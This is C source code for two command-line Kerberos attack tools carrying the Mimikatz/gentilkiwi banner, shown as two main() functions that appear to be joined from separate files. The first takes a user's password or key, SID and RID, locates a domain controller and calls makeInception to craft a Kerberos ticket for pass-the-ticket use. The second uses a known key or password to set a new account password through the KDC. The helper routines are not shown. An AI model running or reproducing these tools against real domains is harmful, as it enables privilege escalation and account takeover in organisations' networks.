int main(int argc, char * argv[])
{
EncryptionKey userKey;
LPCSTR szUser, szDomain, szTarget, szService, szPassword = NULL, szKey = NULL, szSid, szRid, szKdc = NULL, szFilename = NULL;
PSID sid = NULL, domainSid = NULL;
DWORD ret, rid = 0;
PDOMAIN_CONTROLLER_INFO cInfo = NULL;
kprintf("\n"
" .#####. " MIMIKATZ_FULL "\n"
" .## ^ ##. \n"
" ## / \\ ## /* * *\n"
" ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
" '## v ##' http://blog.gentilkiwi.com (oe.eo)\n"
" '#####' ... with thanks to Tom Maddock & Sylvain Monne * * */\n\n");
if(init())
{
if(!kull_m_string_args_byName(argc, argv, "ptt", NULL, NULL))
kull_m_string_args_byName(argc, argv, "ticket", &szFilename, TICKET_FILENAME);
if(kull_m_string_args_byName(argc, argv, "target", &szTarget, NULL))
{
if(kull_m_string_args_byName(argc, argv, "service", &szService, NULL))
{
if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
{
if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
{
if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
{
if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
else
userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;
if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
{
if(!kull_m_string_args_byName(argc, argv, "kdc", &szKdc, NULL))
{
ret = DsGetDcName(NULL, szDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &cInfo);
if(ret == ERROR_SUCCESS)
{
szKdc = cInfo->DomainControllerName + 2;
kprintf("[KDC] \'%s\' will be the main server\n", szKdc);
}
else PRINT_ERROR("[KDC] DsGetDcName: %u\n", ret);
}
if(szKdc)
{
if(kull_m_string_args_byName(argc, argv, "sid", &szSid, NULL) && kull_m_string_args_byName(argc, argv, "rid", &szRid, NULL))
{
if(ConvertStringSidToSid(szSid, &sid))
rid = strtoul(szRid, NULL, 0);
else PRINT_ERROR_AUTO("ConvertStringSidToSid");
}
if(!(sid && rid))
{
if(szPassword)
{
#pragma warning(push)
#pragma warning(disable:4996)
impersonateToGetData(szUser, szDomain, szPassword, szKdc,&sid, &rid, _pgmptr);
#pragma warning(pop)
}
else PRINT_ERROR("Impersonate is only supported with a password (you need KDC, SID & RID)\n");
}
if(sid && rid)
{
kprintf("\n"
"user : %s\n"
"domain : %s\n"
"password : %s\n"
"sid : "
, szUser, szDomain, szKey ? "<NULL>" : "***");
kull_m_string_displaySID(sid);
kprintf("\n"
"target : %s\n"
"service : %s\n"
"rid : %u\n"
"key : "
, szTarget, szService, rid);
kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
kprintf(" (%s)\n"
"ticket : %s\n"
, kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype), szFilename ? szFilename : "** Pass The Ticket **");
if(szKdc)
{
kprintf("kdc : %s\n\n", szKdc);
makeInception(szUser, szDomain, sid, rid, szTarget, szService, &userKey, szKdc, 88, szFilename);
}
else PRINT_ERROR("No KDC at all\n");
LocalFree(sid);
}
else PRINT_ERROR("Missing valid SID & RID (argument or auto)\n");
}
else PRINT_ERROR("Missing one valid DC (argument or auto)\n");
if(cInfo)
NetApiBufferFree(cInfo);
LocalFree(userKey.keyvalue.value);
}
}
else PRINT_ERROR("Missing password/key argument\n");
}
else PRINT_ERROR("Missing domain argument\n");
}
else PRINT_ERROR("Missing user argument\n");
}
else PRINT_ERROR("Missing service argument\n");
}
else PRINT_ERROR("Missing target argument\n");
}
else PRINT_ERROR("init() failed\n");
term();
return 0;
}
int main(int argc, char * argv[])
{
EncryptionKey userKey;
LPCSTR szUser, szDomain, szPassword = NULL, szKey = NULL, szNew;
LPSTR szWhatDC;
kprintf("\n"
" .#####. " MIMIKATZ_FULL "\n"
" .## ^ ##. " MIMIKATZ_SECOND "\n"
" ## / \\ ## /* * *\n"
" ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
" '## v ##' http://blog.gentilkiwi.com (oe.eo)\n"
" '#####' ... with thanks to Aorato / Microsoft ... * * */\n\n");
if(init())
{
if(kull_m_string_args_byName(argc, argv, "user", &szUser, NULL))
{
if(kull_m_string_args_byName(argc, argv, "domain", &szDomain, NULL))
{
if(kull_m_string_args_byName(argc, argv, "key", &szKey, NULL) || kull_m_string_args_byName(argc, argv, "password", &szPassword, NULL))
{
if(kull_m_string_args_byName(argc, argv, "aes256", NULL, NULL))
userKey.keytype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96;
else if(kull_m_string_args_byName(argc, argv, "aes128", NULL, NULL))
userKey.keytype = KERB_ETYPE_AES128_CTS_HMAC_SHA1_96;
else
userKey.keytype = KERB_ETYPE_RC4_HMAC_NT;
if(kull_m_string_args_byName(argc, argv, "new", &szNew, NULL))
{
if(NT_SUCCESS(kull_m_kerberos_asn1_helper_util_stringToKey(szUser, szDomain, szPassword, szKey, &userKey)))
{
if(kull_m_kerberos_helper_net_getDC(szDomain, DS_KDC_REQUIRED, &szWhatDC))
{
kprintf("[KDC] \'%s\' will be the main server\n\n"
"user : %s\n"
"domain : %s\n"
"password : %s\n"
"key : "
, szWhatDC, szUser, szDomain, szKey ? "<NULL>" : "***");
kull_m_string_printf_hex(userKey.keyvalue.value, userKey.keyvalue.length, 0);
kprintf(" (%s)\n", kull_m_kerberos_asn1_helper_util_etypeToString(userKey.keytype));
makeInception(szUser, szDomain, szNew, &userKey, szWhatDC, 88, 464);
LocalFree(szWhatDC);
}
LocalFree(userKey.keyvalue.value);
}
}
else PRINT_ERROR("Missing new password\n");
}
else PRINT_ERROR("Missing password/key argument\n");
}
else PRINT_ERROR("Missing domain argument\n");
}
else PRINT_ERROR("Missing user argument\n");
}
else PRINT_ERROR("init() failed\n");
term();
return 0;
}
